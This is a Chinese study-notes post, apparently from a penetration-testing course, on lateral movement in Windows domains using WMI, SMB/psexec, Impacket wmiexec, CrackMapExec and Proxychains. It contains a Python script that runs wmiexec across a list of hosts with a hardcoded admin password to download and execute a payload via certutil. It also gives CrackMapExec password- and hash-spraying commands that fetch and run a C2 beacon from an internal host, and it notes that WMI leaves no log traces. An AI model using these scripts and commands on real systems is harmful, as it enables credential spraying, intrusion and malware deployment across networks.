129- 横向移动&Wmi&cscript&Smb&CrackMapExec&ProxyChains&Impacket

本章任然使用上一节的拓扑

章节点

IPC,WMI,SMB,PTH,PTK,PTT,SPN,WinRM,WinRS,RDP,Plink,DCOM,SSH;Exchange,LLMNR投毒,Plink,DCOM,Kerberos_TGS,GPO&DACL,

域控提权漏洞,约束委派,数据库攻防,系统补丁下发执行,EDR定向下发执行等

#域信息收集-目标&用户&凭据&网络

#域横向移动-wmi-自带&命令&套件&插件

1、wmi

wmi全称Windows Management Instrumentation

WMI是通过135端口进行利用,支持用户名明文不支持hash的方式进行认证,

并且该方法不会在目标日志系统留下痕迹。

我在网上看到这个信息:

win10 使用该命令会报错

‘wmic’ 不是内部或外部命令,也不是可运行的程序 或批处理文件。

在Win10中,wmic已经归入C:\Windows\System32\wbem文件夹,而环境变量只设置到C:\Windows\System32,因此找不到wmic

只需要添加C:\Windows\System32\wbem 到环境变量——系统变量的Path变量

2、cscript

3、wmiexec-impacket

可以使用hash值进行操作

4、SMB

使用psexec 这是微软官方的工具不会被杀,可以直接去官网下载pstools

需要主机上开启了smb服务才可以

使用smb有时候需要管理员权限(这里的管理员是运行此命令的管理员权限,不知道在攻击上有关系没)才可以,使用此命令也是可以反弹回一个cmd

使用专门的psexec程序或者smbexec.py脚本进行移动还可以使用hash进行操作

最后可以使用cs自带的psexec进行横向移动

5、service

这个命令敲完也是没有回显的

6、Windows+Proxifier+Python_exp

和上期的思路一样通过代理在本机上写脚本去跑

import os

ips=['192.168.3.21','192.168.3.25','192.168.3.29','192.168.3.28','192.168.3.30','192.168.3.32']

def down():
    for ip in ips:
        wmi_exec='python3 .\\wmiexec.py ./administrator:admin!@#45@%s "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/webserver4444.exe c:/webserver4444.exe"'%ip
        print(wmi_exec)
        os.system(wmi_exec)
        
def zx():
    for ip in ips:
        wmi_exec='python3 .\\wmiexec.py ./administrator:admin!@#45@%s "c:/webserver4444.exe"'%ip
        print(wmi_exec)
        os.system(wmi_exec)
        
if __name__ == '__main__':
    down()
    zx()

7、域横向移动-工具-Proxychains&CrackMapExec

CrackMapExec

Github:https://github.com/Porchetta-Industries/CrackMapExec

官方手册:https://mpgn.gitbook.io/crackmapexec/

部分案例:CrackMapExec:一款针对大型Windows活动目录(AD)的后渗透工具 - FreeBuf网络安全行业门户

下载对应release,建立socks连接,设置socks代理,配置规则,调用!

Linux Proxychains使用

安装使用:proxychains 安装和proxychains 代理nmap-CSDN博客

代理配置:Proxychains.conf 代理调用:Proxychains 命令

使用

密码喷射域登录(验证用户名密码是否正确,默认域用户):

  • proxychains crackmapexec smb 192.168.20.10-30 -u administrator -p 'admin@123'

密码喷射本地登录(验证用户名密码是否正确):

  • proxychains crackmapexec smb 192.168.20.10-30 -u administrator -p 'admin@123' --local-auth

密码喷射本地登录命令执行:

  • proxychains crackmapexec smb 192.168.20.10-30 -u administrator -p 'admin@123' -x 'whoami' --local-auth

hash喷射域登录命令执行:

  • proxychains crackmapexec smb 192.168.3.21-32 -u administrator -H 'ccef208c6485269c20db2cad21734fe7' -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/webserver4444.exe c:/webserver4444.exe & c:/webserver4444.exe'

cs上线为反向连接,需要代理转发,转发上线

密码喷射本地登录命令执行上线:

  • proxychains crackmapexec smb 192.168.20.10-30 -u administrator -p 'admin@123' -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.20.20/2222.exe c:/2222.exe & c:/2222.exe' --local-auth

密码喷射域登录命令执行上线:

  • proxychains crackmapexec smb 192.168.20.10-30 -u administrator -p 'admin@123' -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.20.20/2222.exe c:/2222.exe & c:/2222.exe'

密码喷射本地&域登录命令执行全自动上线:

写两个字典,一个放用户名,另一个放密码

  • proxychains crackmapexec smb 192.168.20.10-30 -u user.txt -p pass.txt -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.20.20/2222.exe c:/2222.exe & c:/2222.exe'

另外kali上面自带了这个

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值